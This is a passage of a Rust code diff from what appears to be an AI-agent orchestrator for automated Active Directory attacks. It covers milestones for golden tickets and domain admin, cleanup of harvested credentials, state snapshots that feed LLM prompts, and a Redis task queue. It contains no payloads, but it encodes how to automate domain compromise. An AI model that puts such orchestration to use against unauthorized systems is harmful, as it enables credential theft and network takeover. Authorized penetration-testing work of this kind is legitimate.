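/// `dc01.contoso.local` → Some("contoso.local"); AWS PTR names and bare
/// hostnames yield None so the caller can fall back to state.domains[0].
fn derive_domain(hostname: &str) -> Option<String> {
    let domain: String = hostname.split('.').skip(1).collect::<Vec<_>>().join(".");
    if domain.is_empty()
        || domain.contains("compute.internal")
        || domain.contains("amazonaws.com")
    {
        None
    } else {
        Some(domain.to_lowercase())
    }
}

fn main() {
    assert_eq!(derive_domain("dc01.contoso.local").as_deref(), Some("contoso.local"));
    assert_eq!(derive_domain("ip-10-1-2-150.us-west-2.compute.internal"), None);
    assert_eq!(derive_domain("dc01"), None);
}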
- pub async fn set_golden_ticket(&self, queue: &TaskQueue, domain: &str) -> Result<()> { - { - let state = self.inner.read().await; - if state.has_golden_ticket { - return Ok(()); - } - } - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - reader - .set_meta_field( - &mut conn, - "has_golden_ticket", - &serde_json::Value::Bool(true), - ) - .await?; - - // Resolve DC IP for the vulnerability target - let dc_target = { - let state = self.inner.read().await; - state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned() - .unwrap_or_else(|| domain.to_string()) - }; - - let mut state = self.inner.write().await; - state.has_golden_ticket = true; - tracing::info!(domain = %domain, "🏆 Golden ticket flag set"); - drop(state); - - // Synthesize a golden_ticket vulnerability so loot reflects the achievement - let vuln_id = format!("golden_ticket_{}", domain.to_lowercase()); - let mut details = HashMap::new(); - details.insert( - "domain".into(), - serde_json::Value::String(domain.to_string()), - ); - details.insert( - "note".into(), - serde_json::Value::String( - "Golden ticket forged — persistent domain access via krbtgt key".to_string(), - ), - ); - let vuln = VulnerabilityInfo { - vuln_id: vuln_id.clone(), - vuln_type: "golden_ticket".to_string(), - target: dc_target, - discovered_by: "golden_ticket_automation".to_string(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: String::new(), - priority: 1, - }; - let _ = self.publish_vulnerability(queue, vuln).await; - let _ = self.mark_exploited(queue, &vuln_id).await; - Ok(()) - } - - /// Set has_domain_admin flag and persist to Redis. - pub async fn set_domain_admin(&self, queue: &TaskQueue, path: Option) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - reader - .set_meta_field( - &mut conn, - "has_domain_admin", - &serde_json::Value::Bool(true), - ) - .await?; - if let Some(ref p) = path { - reader - .set_meta_field( - &mut conn, - "domain_admin_path", - &serde_json::Value::String(p.clone()), - ) - .await?; - } - - let mut state = self.inner.write().await; - state.has_domain_admin = true; - state.domain_admin_path = path.clone(); - - // Emit OTel span recording domain admin achievement. - // Walk parent_id chain from krbtgt hash to compute attack depth. 
- let (attack_path_str, depth) = { - let krbtgt = state.hashes.iter().find(|h| { - h.username.eq_ignore_ascii_case("krbtgt") - && h.hash_type.to_lowercase().contains("ntlm") - }); - let depth = match krbtgt { - Some(h) => { - // Count chain depth by walking parent_id - let mut d = 1usize; - let mut current_id = h.parent_id.clone(); - let mut seen = std::collections::HashSet::new(); - while let Some(ref pid) = current_id { - if !seen.insert(pid.clone()) { - break; - } - d += 1; - // Check credentials then hashes for the parent - if let Some(c) = state.credentials.iter().find(|c| c.id == *pid) { - current_id = c.parent_id.clone(); - } else if let Some(h2) = state.hashes.iter().find(|h2| h2.id == *pid) { - current_id = h2.parent_id.clone(); - } else { - break; - } - } - d - } - None => 0, - }; - let ap = path - .as_deref() - .filter(|s| !s.is_empty()) - .unwrap_or("domain_admin_achieved") - .to_string(); - (ap, depth) - }; - let op_id = state.operation_id.clone(); - drop(state); - - let span = - ares_core::telemetry::spans::trace_domain_admin(&attack_path_str, depth, Some(&op_id)); - let _guard = span.enter(); - tracing::info!(attack_path = %attack_path_str, depth = depth, "🏆 Domain admin achieved"); - - Ok(()) - } -} diff --git a/ares-orchestrator/src/state/publishing/mod.rs b/ares-orchestrator/src/state/publishing/mod.rs deleted file mode 100644 index 843db1f5..00000000 --- a/ares-orchestrator/src/state/publishing/mod.rs +++ /dev/null @@ -1,117 +0,0 @@ -//! Publishing methods — add credentials, hashes, hosts, and vulnerabilities -//! to both in-memory state and Redis. - -mod credentials; -mod entities; -mod hosts; -mod milestones; - -use regex::Regex; -use std::sync::LazyLock; - -/// Regex matching `Password` (case-insensitive) followed by optional `:` and space. -pub(super) static PASSWORD_PREFIX_RE: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)^password\s*:\s*").unwrap()); - -/// Regex matching trailing parenthetical metadata like ` (Guest)`, ` (Pwn3d!)`. -pub(super) static TRAILING_PAREN_RE: LazyLock = - LazyLock::new(|| Regex::new(r"\s+\([^)]+\)\s*$").unwrap()); - -/// Sanitize and validate a credential before storage. -/// -/// Mirrors Python's `add_credential()` — strips noise from password values, -/// normalizes `user@domain@domain` usernames, resolves NetBIOS domains to FQDN, -/// and rejects invalid entries. Returns `None` if the credential should be dropped. 
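The attack-depth computation above walks `parent_id` links with a seen-set to break cycles. A self-contained sketch over a flat child-to-parent map, standing in for the credentials/hashes lookup in `set_domain_admin`:

use std::collections::{HashMap, HashSet};

/// Walk parent links from `start`, counting hops; the seen-set guards
/// against cyclic parent_id chains, as in the depth walk above.
fn chain_depth(parents: &HashMap<&str, &str>, start: &str) -> usize {
    let mut depth = 1;
    let mut current = parents.get(start);
    let mut seen = HashSet::new();
    while let Some(&pid) = current {
        if !seen.insert(pid) {
            break; // cycle detected
        }
        depth += 1;
        current = parents.get(pid);
    }
    depth
}

fn main() {
    let parents = HashMap::from([("krbtgt", "da_cred"), ("da_cred", "initial")]);
    assert_eq!(chain_depth(&parents, "krbtgt"), 3);
}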
-pub(super) fn sanitize_credential( - mut cred: ares_core::models::Credential, - netbios_to_fqdn: &std::collections::HashMap, -) -> Option { - use crate::output_extraction::strip_ansi; - - // Strip ANSI escape codes (tools like NetExec emit colored output) - cred.username = strip_ansi(&cred.username); - cred.password = strip_ansi(&cred.password); - cred.domain = strip_ansi(&cred.domain); - - // Trim whitespace - cred.username = cred.username.trim().to_string(); - cred.password = cred.password.trim().to_string(); - cred.domain = cred.domain.trim().to_string(); - - // Strip "Password: " / "Password:" prefix from password - if PASSWORD_PREFIX_RE.is_match(&cred.password) { - cred.password = PASSWORD_PREFIX_RE.replace(&cred.password, "").to_string(); - } - - // Strip trailing parenthetical metadata: "svc_test (Guest)" → "svc_test" - if TRAILING_PAREN_RE.is_match(&cred.password) { - cred.password = TRAILING_PAREN_RE.replace(&cred.password, "").to_string(); - } - - // Strip ellipsis truncation artifacts (matches Python add_credential) - while cred.password.ends_with("...") { - cred.password = cred.password[..cred.password.len() - 3].trim().to_string(); - } - while cred.password.ends_with('\u{2026}') { - cred.password.pop(); - cred.password = cred.password.trim().to_string(); - } - - // Normalize username with embedded @domain suffixes - // e.g. "sam.wilson@child.contoso.local@fabrikam.local" - // → username="sam.wilson", domain="child.contoso.local" - if cred.username.contains('@') { - let username_clone = cred.username.clone(); - let parts: Vec<&str> = username_clone.splitn(2, '@').collect(); - if parts.len() == 2 && !parts[0].is_empty() { - let base_username = parts[0].to_string(); - let domain_part = parts[1].split('@').next().unwrap_or(parts[1]).to_string(); - if domain_part.contains('.') { - cred.username = base_username; - cred.domain = domain_part; - } - } - } - - // Resolve NetBIOS domain to FQDN (e.g. "CHILD" → "child.contoso.local") - if !cred.domain.is_empty() && !cred.domain.contains('.') { - let domain_upper = cred.domain.to_uppercase(); - if let Some(fqdn) = netbios_to_fqdn.get(&domain_upper) { - // netbios_to_fqdn maps SHORTNAME → host.contoso.local - // Extract the domain suffix - let parts: Vec<&str> = fqdn.split('.').collect(); - if parts.len() >= 3 { - cred.domain = parts[1..].join("."); - } else { - cred.domain = fqdn.clone(); - } - } else { - // Try matching domain as prefix of any FQDN domain suffix - let domain_lower = cred.domain.to_lowercase(); - for fqdn in netbios_to_fqdn.values() { - let fqdn_parts: Vec<&str> = fqdn.split('.').collect(); - if fqdn_parts.len() >= 3 { - let domain_suffix = fqdn_parts[1..].join("."); - let first_label = fqdn_parts[1].to_lowercase(); - if first_label == domain_lower { - cred.domain = domain_suffix; - break; - } - } - } - } - } - - // Validate after sanitization - if !crate::output_extraction::is_valid_credential(&cred.username, &cred.password) { - return None; - } - - Some(cred) -} - -/// Check if a hostname is an AWS internal PTR name. -pub(super) fn is_aws_hostname(hostname: &str) -> bool { - let lower = hostname.to_lowercase(); - lower.starts_with("ip-") && lower.contains("compute.internal") -} diff --git a/ares-orchestrator/src/state/shared.rs b/ares-orchestrator/src/state/shared.rs deleted file mode 100644 index 3240e03c..00000000 --- a/ares-orchestrator/src/state/shared.rs +++ /dev/null @@ -1,234 +0,0 @@ -//! SharedState — thread-safe wrapper around StateInner. 
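A trimmed illustration of the password-cleanup steps in `sanitize_credential` — prefix stripping, trailing-parenthetical removal, and truncation-artifact trimming — using the same regex-crate patterns defined above; the credential struct and NetBIOS resolution are omitted:

use regex::Regex;

fn clean_password(raw: &str) -> String {
    let prefix = Regex::new(r"(?i)^password\s*:\s*").unwrap();
    let trailing = Regex::new(r"\s+\([^)]+\)\s*$").unwrap();
    let mut p = prefix.replace(raw.trim(), "").to_string();
    p = trailing.replace(&p, "").to_string();
    while p.ends_with("...") {
        p = p[..p.len() - 3].trim().to_string(); // drop truncation artifacts
    }
    p
}

fn main() {
    assert_eq!(clean_password("Password: Summer2024! (Pwn3d!)"), "Summer2024!");
}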
- -use std::sync::Arc; -use tokio::sync::RwLock; - -use super::inner::StateInner; - -/// Thread-safe shared state with read/write access. -#[derive(Clone)] -pub struct SharedState { - pub(super) inner: Arc>, -} - -impl SharedState { - /// Create a new empty state. - pub fn new(operation_id: String) -> Self { - Self { - inner: Arc::new(RwLock::new(StateInner::new(operation_id))), - } - } - - /// Create a cheap snapshot of state for prompt generation. - /// - /// Clones the relevant fields so the RwLock is released before LLM calls. - pub async fn snapshot(&self) -> ares_llm::prompt::StateSnapshot { - let s = self.inner.read().await; - - // Compute undominated forests inline (avoids re-acquiring lock) - let undominated = crate::completion::compute_undominated_forests( - s.target.as_ref().map(|t| t.domain.as_str()), - s.domains.first().map(|d| d.as_str()), - &s.trusted_domains, - &s.dominated_domains, - ); - - ares_llm::prompt::StateSnapshot { - credentials: s.credentials.clone(), - hashes: s.hashes.clone(), - hosts: s.hosts.clone(), - shares: s.shares.clone(), - domains: s.domains.clone(), - discovered_vulnerabilities: s.discovered_vulnerabilities.clone(), - exploited_vulnerabilities: s.exploited_vulnerabilities.clone(), - domain_controllers: s.domain_controllers.clone(), - netbios_to_fqdn: s.netbios_to_fqdn.clone(), - has_domain_admin: s.has_domain_admin, - has_golden_ticket: s.has_golden_ticket, - undominated_forests: undominated, - delegation_accounts: s - .discovered_vulnerabilities - .values() - .filter(|v| { - let vt = v.vuln_type.to_lowercase(); - vt == "constrained_delegation" || vt == "rbcd" - }) - .filter_map(|v| { - v.details - .get("account_name") - .or_else(|| v.details.get("AccountName")) - .and_then(|x| x.as_str()) - .map(|s| s.to_lowercase()) - }) - .collect(), - } - } - - /// Read-only access to the state. - pub async fn read(&self) -> tokio::sync::RwLockReadGuard<'_, StateInner> { - self.inner.read().await - } - - /// Write access to the state. - pub async fn write(&self) -> tokio::sync::RwLockWriteGuard<'_, StateInner> { - self.inner.write().await - } - - /// Get the vuln queue ZSET key. - pub async fn vuln_queue_key(&self) -> String { - let state = self.inner.read().await; - format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - state.operation_id, - super::KEY_VULN_QUEUE - ) - } - - /// Get the discovery list key. - pub async fn discovery_key(&self) -> String { - let state = self.inner.read().await; - format!("{}:{}", super::DISCOVERY_KEY_PREFIX, state.operation_id) - } - - /// Get the operation ID. 
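The snapshot pattern used here — clone what the prompt needs under a short read lock, then release before any slow LLM call — in miniature (assumes tokio with the rt and macros features; `Inner` is a hypothetical stand-in for `StateInner`):

use std::sync::Arc;
use tokio::sync::RwLock;

#[derive(Clone, Default)]
struct Inner { domains: Vec<String> }

async fn snapshot(state: &Arc<RwLock<Inner>>) -> Vec<String> {
    // The read guard drops at the end of this expression, so callers never
    // hold the lock across slow work — mirroring snapshot() above.
    state.read().await.domains.clone()
}

#[tokio::main]
async fn main() {
    let state = Arc::new(RwLock::new(Inner { domains: vec!["contoso.local".into()] }));
    assert_eq!(snapshot(&state).await, vec!["contoso.local".to_string()]);
}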
- pub async fn operation_id(&self) -> String { - self.inner.read().await.operation_id.clone() - } -} - -#[cfg(test)] -mod tests { - use super::*; - use ares_core::models::*; - use std::collections::HashMap; - - #[tokio::test] - async fn test_shared_state_new() { - let state = SharedState::new("op-test".into()); - assert_eq!(state.operation_id().await, "op-test"); - } - - #[tokio::test] - async fn test_snapshot_empty_state() { - let state = SharedState::new("op-1".into()); - let snap = state.snapshot().await; - assert!(snap.credentials.is_empty()); - assert!(snap.hashes.is_empty()); - assert!(snap.hosts.is_empty()); - assert!(snap.shares.is_empty()); - assert!(snap.domains.is_empty()); - assert!(snap.discovered_vulnerabilities.is_empty()); - assert!(snap.exploited_vulnerabilities.is_empty()); - assert!(snap.domain_controllers.is_empty()); - assert!(!snap.has_domain_admin); - assert!(!snap.has_golden_ticket); - } - - #[tokio::test] - async fn test_snapshot_reflects_state_mutations() { - let state = SharedState::new("op-1".into()); - - // Mutate state directly - { - let mut inner = state.write().await; - inner.credentials.push(Credential { - id: "c1".into(), - username: "admin".into(), - password: "pass".into(), - domain: "contoso.local".into(), - source: "test".into(), - discovered_at: None, - is_admin: true, - parent_id: None, - attack_step: 0, - }); - inner.domains.push("contoso.local".into()); - inner - .domain_controllers - .insert("contoso.local".into(), "192.168.58.10".into()); - inner.has_domain_admin = true; - } - - let snap = state.snapshot().await; - assert_eq!(snap.credentials.len(), 1); - assert_eq!(snap.credentials[0].username, "admin"); - assert_eq!(snap.domains, vec!["contoso.local"]); - assert_eq!( - snap.domain_controllers.get("contoso.local"), - Some(&"192.168.58.10".to_string()) - ); - assert!(snap.has_domain_admin); - } - - #[tokio::test] - async fn test_snapshot_is_independent_copy() { - let state = SharedState::new("op-1".into()); - { - let mut inner = state.write().await; - inner.domains.push("contoso.local".into()); - } - - let snap = state.snapshot().await; - assert_eq!(snap.domains.len(), 1); - - // Mutate state after snapshot - { - let mut inner = state.write().await; - inner.domains.push("fabrikam.local".into()); - } - - // Snapshot should still have only 1 domain - assert_eq!(snap.domains.len(), 1); - - // New snapshot should have 2 - let snap2 = state.snapshot().await; - assert_eq!(snap2.domains.len(), 2); - } - - #[tokio::test] - async fn test_vuln_queue_key() { - let state = SharedState::new("op-abc".into()); - let key = state.vuln_queue_key().await; - assert!(key.contains("op-abc")); - assert!(key.ends_with("vuln_queue")); - } - - #[tokio::test] - async fn test_discovery_key() { - let state = SharedState::new("op-xyz".into()); - let key = state.discovery_key().await; - assert!(key.contains("op-xyz")); - assert!(key.starts_with("ares:discoveries:")); - } - - #[tokio::test] - async fn test_snapshot_with_vulnerabilities() { - let state = SharedState::new("op-1".into()); - { - let mut inner = state.write().await; - let mut details = HashMap::new(); - details.insert("account".into(), serde_json::json!("svc_sql")); - inner.discovered_vulnerabilities.insert( - "vuln-001".into(), - VulnerabilityInfo { - vuln_id: "vuln-001".into(), - vuln_type: "constrained_delegation".into(), - target: "192.168.58.20".into(), - discovered_by: "recon".into(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: "privesc".into(), - priority: 3, - }, - ); - 
inner.exploited_vulnerabilities.insert("vuln-002".into()); - } - - let snap = state.snapshot().await; - assert_eq!(snap.discovered_vulnerabilities.len(), 1); - assert!(snap.discovered_vulnerabilities.contains_key("vuln-001")); - assert_eq!(snap.exploited_vulnerabilities.len(), 1); - assert!(snap.exploited_vulnerabilities.contains("vuln-002")); - } -} diff --git a/ares-orchestrator/src/task_queue.rs b/ares-orchestrator/src/task_queue.rs deleted file mode 100644 index 2385e9e3..00000000 --- a/ares-orchestrator/src/task_queue.rs +++ /dev/null @@ -1,488 +0,0 @@ -//! Redis-backed task queue matching the Python `RedisTaskQueue`. -//! -//! Key patterns: -//! - `ares:tasks:{role}` — List, per-role task queue -//! - `ares:results:{task_id}` — List, per-task result mailbox (TTL 24h) -//! - `ares:heartbeat:{agent}` — String, agent heartbeat (TTL from config) -//! - `ares:task_status:{task_id}` — String, task lifecycle JSON -//! - `ares:lock:{op_id}` — String, operation lock with TTL refresh -//! -//! Workers BRPOP from the right; the orchestrator pushes to the left (LPUSH) -//! for normal priority and to the right (RPUSH) for urgent priority, giving -//! FIFO semantics with priority bypass. - -use std::collections::HashMap; -use std::time::Duration; - -use anyhow::{Context, Result}; -use chrono::{DateTime, Utc}; -use redis::aio::ConnectionManager; -use redis::AsyncCommands; -use serde::{Deserialize, Serialize}; -use tracing::{debug, info, warn}; -use uuid::Uuid; - -// --------------------------------------------------------------------------- -// Constants — must match the Python RedisTaskQueue class attributes exactly. -// --------------------------------------------------------------------------- - -pub const TASK_QUEUE_PREFIX: &str = "ares:tasks"; -pub const RESULT_QUEUE_PREFIX: &str = "ares:results"; -pub const HEARTBEAT_PREFIX: &str = "ares:heartbeat"; -pub const TASK_STATUS_PREFIX: &str = "ares:task_status"; -pub const LOCK_PREFIX: &str = "ares:lock"; -pub const STATE_UPDATE_CHANNEL_PREFIX: &str = "ares:state:updates"; - -/// Result keys expire after 24 hours. -const RESULT_TTL_SECS: u64 = 60 * 60 * 24; - -/// Task status keys expire after 24 hours. -const TASK_STATUS_TTL_SECS: u64 = 60 * 60 * 24; - -// --------------------------------------------------------------------------- -// Wire types — JSON-compatible with the Python TaskMessage / TaskResult. -// --------------------------------------------------------------------------- - -/// Task submitted to a role queue. Mirrors `ares.core.task_queue.TaskMessage`. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct TaskMessage { - pub task_id: String, - pub task_type: String, - pub source_agent: String, - pub target_agent: String, - pub payload: serde_json::Value, - #[serde(default = "default_priority")] - pub priority: i32, - pub created_at: Option>, - pub callback_queue: Option, -} - -fn default_priority() -> i32 { - 5 -} - -/// Result returned by a worker. Mirrors `ares.core.task_queue.TaskResult`. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct TaskResult { - pub task_id: String, - pub success: bool, - #[serde(default)] - pub result: Option, - #[serde(default)] - pub error: Option, - pub completed_at: Option>, - #[serde(default)] - pub worker_pod: Option, - #[serde(default)] - pub agent_name: Option, -} - -/// Heartbeat payload written by agents. 
-#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct HeartbeatData { - pub agent: String, - pub status: String, - pub timestamp: String, - #[serde(default)] - pub current_task: Option, - #[serde(default)] - pub pod_name: Option, -} - -// --------------------------------------------------------------------------- -// TaskQueue — thin async wrapper around a redis ConnectionManager. -// --------------------------------------------------------------------------- - -/// Async Redis task queue implementing the Ares queue protocol. -#[derive(Clone)] -pub struct TaskQueue { - conn: ConnectionManager, -} - -#[allow(dead_code)] -impl TaskQueue { - /// Create a new queue from an existing connection manager. - pub fn new(conn: ConnectionManager) -> Self { - Self { conn } - } - - /// Connect to Redis and return a TaskQueue. - pub async fn connect(redis_url: &str) -> Result { - let client = redis::Client::open(redis_url) - .with_context(|| format!("Invalid Redis URL: {redis_url}"))?; - // Default response_timeout is 500ms which is too short for BRPOP - // blocking calls (tool results can take minutes). Without this fix, - // the client-side timeout cancels the future but the server-side - // BRPOP remains registered, consuming results that are silently lost. - let config = redis::aio::ConnectionManagerConfig::new() - .set_response_timeout(Some(Duration::from_secs(1800))); - let conn = client - .get_connection_manager_with_config(config) - .await - .with_context(|| format!("Failed to connect to Redis at {redis_url}"))?; - info!(url = %redis_url, "Connected to Redis"); - Ok(Self { conn }) - } - - // === Key helpers ======================================================== - - #[inline] - fn task_queue_key(role: &str) -> String { - format!("{TASK_QUEUE_PREFIX}:{role}") - } - - #[inline] - fn result_queue_key(task_id: &str) -> String { - format!("{RESULT_QUEUE_PREFIX}:{task_id}") - } - - #[inline] - fn heartbeat_key(agent: &str) -> String { - format!("{HEARTBEAT_PREFIX}:{agent}") - } - - #[inline] - fn task_status_key(task_id: &str) -> String { - format!("{TASK_STATUS_PREFIX}:{task_id}") - } - - // === Orchestrator methods =============================================== - - /// Submit a task to a role's queue. - /// - /// Priority <= 2 (urgent) uses RPUSH so the task is consumed first by - /// workers that BRPOP from the right. All other priorities use LPUSH for - /// FIFO order. 
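The LPUSH/RPUSH split described above yields FIFO order with an urgent-bypass lane because workers BRPOP from the right. The queue semantics modeled with a `VecDeque` (push_front ≈ LPUSH, push_back ≈ RPUSH, pop_back ≈ BRPOP):

use std::collections::VecDeque;

fn main() {
    let mut q: VecDeque<&str> = VecDeque::new();
    q.push_front("task-a"); // normal priority: LPUSH (left)
    q.push_front("task-b"); // normal priority: LPUSH (left)
    q.push_back("urgent");  // priority <= 2: RPUSH (right)

    // Worker consumes from the right (BRPOP): urgent first, then FIFO.
    assert_eq!(q.pop_back(), Some("urgent"));
    assert_eq!(q.pop_back(), Some("task-a"));
    assert_eq!(q.pop_back(), Some("task-b"));
}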
- pub async fn submit_task( - &self, - task_type: &str, - target_role: &str, - payload: serde_json::Value, - source_agent: &str, - priority: i32, - ) -> Result { - let task_id = format!("{}_{}", task_type, &Uuid::new_v4().to_string()[..12]); - let callback = Self::result_queue_key(&task_id); - - let msg = TaskMessage { - task_id: task_id.clone(), - task_type: task_type.to_string(), - source_agent: source_agent.to_string(), - target_agent: target_role.to_string(), - payload, - priority, - created_at: Some(Utc::now()), - callback_queue: Some(callback), - }; - - let queue_key = Self::task_queue_key(target_role); - let json = serde_json::to_string(&msg).context("Failed to serialize TaskMessage")?; - - let mut conn = self.conn.clone(); - if priority <= 2 { - conn.rpush::<_, _, ()>(&queue_key, &json) - .await - .with_context(|| format!("RPUSH to {queue_key}"))?; - info!(task_id = %task_id, queue = %queue_key, priority, "Urgent task submitted (RPUSH)"); - } else { - conn.lpush::<_, _, ()>(&queue_key, &json) - .await - .with_context(|| format!("LPUSH to {queue_key}"))?; - info!(task_id = %task_id, queue = %queue_key, priority, "Task submitted (LPUSH)"); - } - - // Track status - self.set_task_status(&task_id, "pending").await?; - - Ok(task_id) - } - - /// Non-destructive peek: does a result exist for this task? - pub async fn has_pending_result(&self, task_id: &str) -> Result { - let key = Self::result_queue_key(task_id); - let mut conn = self.conn.clone(); - let len: i64 = conn.llen(&key).await.unwrap_or(0); - Ok(len > 0) - } - - /// Non-blocking check for a task result (RPOP). - pub async fn check_result(&self, task_id: &str) -> Result> { - let key = Self::result_queue_key(task_id); - let mut conn = self.conn.clone(); - let data: Option = conn.rpop(&key, None).await?; - match data { - Some(json) => { - let result: TaskResult = serde_json::from_str(&json) - .with_context(|| format!("Bad TaskResult JSON for {task_id}"))?; - Ok(Some(result)) - } - None => Ok(None), - } - } - - /// Batch-check results for multiple task IDs using a pipeline. - pub async fn check_results_batch( - &self, - task_ids: &[String], - ) -> Result>> { - if task_ids.is_empty() { - return Ok(HashMap::new()); - } - - let mut pipe = redis::pipe(); - for tid in task_ids { - let key = Self::result_queue_key(tid); - pipe.cmd("RPOP").arg(key); - } - - let mut conn = self.conn.clone(); - let raw: Vec> = pipe - .query_async(&mut conn) - .await - .context("Pipeline check_results_batch failed")?; - - let mut out = HashMap::with_capacity(task_ids.len()); - for (tid, data) in task_ids.iter().zip(raw) { - let parsed = match data { - Some(json) => match serde_json::from_str::(&json) { - Ok(r) => Some(r), - Err(e) => { - warn!(task_id = %tid, err = %e, "Ignoring malformed TaskResult"); - None - } - }, - None => None, - }; - out.insert(tid.clone(), parsed); - } - Ok(out) - } - - /// Blocking wait for a result (BRPOP). Timeout in seconds. - pub async fn poll_result( - &self, - task_id: &str, - timeout_secs: f64, - ) -> Result> { - let key = Self::result_queue_key(task_id); - let mut conn = self.conn.clone(); - let result: Option<(String, String)> = conn - .brpop(&key, timeout_secs) - .await - .with_context(|| format!("BRPOP on {key}"))?; - - match result { - Some((_key, json)) => { - let tr: TaskResult = serde_json::from_str(&json) - .with_context(|| format!("Bad TaskResult JSON for {task_id}"))?; - Ok(Some(tr)) - } - None => Ok(None), - } - } - - /// Get the length of a role's task queue. 
- pub async fn queue_length(&self, role: &str) -> Result { - let key = Self::task_queue_key(role); - let mut conn = self.conn.clone(); - let len: usize = conn.llen(&key).await?; - Ok(len) - } - - /// Read heartbeat data for an agent. - pub async fn get_heartbeat(&self, agent: &str) -> Result> { - let key = Self::heartbeat_key(agent); - let mut conn = self.conn.clone(); - let data: Option = conn.get(&key).await?; - match data { - Some(json) => { - let hb: HeartbeatData = serde_json::from_str(&json)?; - Ok(Some(hb)) - } - None => Ok(None), - } - } - - /// Write heartbeat for an agent (with TTL so stale entries self-expire). - pub async fn send_heartbeat( - &self, - agent: &str, - status: &str, - current_task: Option<&str>, - ttl: Duration, - ) -> Result<()> { - let key = Self::heartbeat_key(agent); - let hb = HeartbeatData { - agent: agent.to_string(), - status: status.to_string(), - timestamp: Utc::now().to_rfc3339(), - current_task: current_task.map(|s| s.to_string()), - pod_name: std::env::var("POD_NAME").ok(), - }; - let json = serde_json::to_string(&hb)?; - let mut conn = self.conn.clone(); - conn.set_ex::<_, _, ()>(&key, &json, ttl.as_secs()) - .await - .with_context(|| format!("SET EX heartbeat for {agent}"))?; - debug!(agent, status, "Heartbeat sent"); - Ok(()) - } - - /// Publish a state-update notification on the PubSub channel. - pub async fn publish_state_update(&self, operation_id: &str) -> Result<()> { - let channel = format!("{STATE_UPDATE_CHANNEL_PREFIX}:{operation_id}"); - let mut conn = self.conn.clone(); - conn.publish::<_, _, ()>(&channel, "updated") - .await - .with_context(|| format!("PUBLISH to {channel}"))?; - debug!(operation_id, "State update published"); - Ok(()) - } - - // === Operation lock ===================================================== - - /// Try to acquire the operation lock. Returns true if acquired. - pub async fn try_acquire_lock(&self, operation_id: &str, ttl: Duration) -> Result { - let key = format!("{LOCK_PREFIX}:{operation_id}"); - let holder = format!( - "orchestrator-{}", - std::env::var("POD_NAME").unwrap_or_else(|_| Uuid::new_v4().to_string()) - ); - let mut conn = self.conn.clone(); - let acquired: bool = redis::cmd("SET") - .arg(&key) - .arg(&holder) - .arg("NX") - .arg("EX") - .arg(ttl.as_secs()) - .query_async(&mut conn) - .await - .with_context(|| format!("SET NX lock for operation {operation_id}"))?; - if acquired { - info!(operation_id, "Operation lock acquired"); - } - Ok(acquired) - } - - /// Extend the operation lock TTL. Call periodically to keep it alive. - pub async fn extend_lock(&self, operation_id: &str, ttl: Duration) -> Result { - let key = format!("{LOCK_PREFIX}:{operation_id}"); - let mut conn = self.conn.clone(); - let ok: bool = conn.expire(&key, ttl.as_secs() as i64).await?; - if !ok { - warn!(operation_id, "Lock key missing — could not extend TTL"); - } - Ok(ok) - } - - // === Task status tracking =============================================== - - /// Set the status string for a task (with 24h TTL). - /// - /// If a record already exists for this task, preserves existing fields - /// (operation_id, role, task_type, started_at, payload) and updates - /// only the status and timestamps. 
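The read-modify-write described above, reduced to the serde_json merge: parse whatever record exists (or start from an empty object), overwrite only the status fields, and keep everything else intact. A sketch assuming only the serde_json crate:

fn merge_status(existing: Option<&str>, task_id: &str, status: &str) -> serde_json::Value {
    let mut record: serde_json::Value = existing
        .and_then(|s| serde_json::from_str(s).ok())
        .unwrap_or_else(|| serde_json::json!({}));
    record["task_id"] = serde_json::json!(task_id);
    record["status"] = serde_json::json!(status);
    record
}

fn main() {
    let prior = r#"{"role":"recon","started_at":"2026-04-17T14:00:00Z"}"#;
    let merged = merge_status(Some(prior), "t1", "completed");
    assert_eq!(merged["role"], "recon"); // untouched fields survive
    assert_eq!(merged["status"], "completed");
}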
- pub async fn set_task_status(&self, task_id: &str, status: &str) -> Result<()> { - let key = Self::task_status_key(task_id); - let mut conn = self.conn.clone(); - - // Read-modify-write: preserve existing fields - let existing: Option = match conn.get::<_, Option>(&key).await { - Ok(v) => v, - Err(e) => { - warn!(task_id = task_id, err = %e, "Failed to read existing task status"); - None - } - }; - let mut payload: serde_json::Value = existing - .and_then(|s| serde_json::from_str(&s).ok()) - .unwrap_or_else(|| serde_json::json!({})); - - let now = Utc::now().to_rfc3339(); - payload["task_id"] = serde_json::json!(task_id); - payload["status"] = serde_json::json!(status); - payload["updated_at"] = serde_json::json!(now); - - if status == "in_progress" && payload.get("started_at").is_none() { - payload["started_at"] = serde_json::json!(now); - } - if status == "completed" || status == "failed" { - payload["ended_at"] = serde_json::json!(now); - } - - let json = payload.to_string(); - conn.set_ex::<_, _, ()>(&key, &json, TASK_STATUS_TTL_SECS) - .await?; - Ok(()) - } - - /// Write a full task status record with all metadata. - pub async fn set_task_status_full( - &self, - task_id: &str, - status: &str, - operation_id: &str, - role: &str, - task_type: &str, - payload: Option<&serde_json::Value>, - ) -> Result<()> { - let key = Self::task_status_key(task_id); - let now = Utc::now().to_rfc3339(); - let mut record = serde_json::json!({ - "task_id": task_id, - "status": status, - "operation_id": operation_id, - "role": role, - "task_type": task_type, - "updated_at": now, - }); - if status == "in_progress" { - record["started_at"] = serde_json::json!(now); - } - if let Some(p) = payload { - record["payload"] = p.clone(); - } - let json = record.to_string(); - let mut conn = self.conn.clone(); - conn.set_ex::<_, _, ()>(&key, &json, TASK_STATUS_TTL_SECS) - .await?; - Ok(()) - } - - /// Read task status. - pub async fn get_task_status(&self, task_id: &str) -> Result> { - let key = Self::task_status_key(task_id); - let mut conn = self.conn.clone(); - let data: Option = conn.get(&key).await?; - Ok(data) - } - - /// Get a clone of the underlying connection manager. - /// - /// Used by the deferred queue to run ZSET commands directly. - pub fn connection(&self) -> ConnectionManager { - self.conn.clone() - } - - /// Send a result to the task's result queue (worker side). - pub async fn send_result(&self, task_id: &str, result: &TaskResult) -> Result<()> { - let key = Self::result_queue_key(task_id); - let json = serde_json::to_string(result)?; - let mut conn = 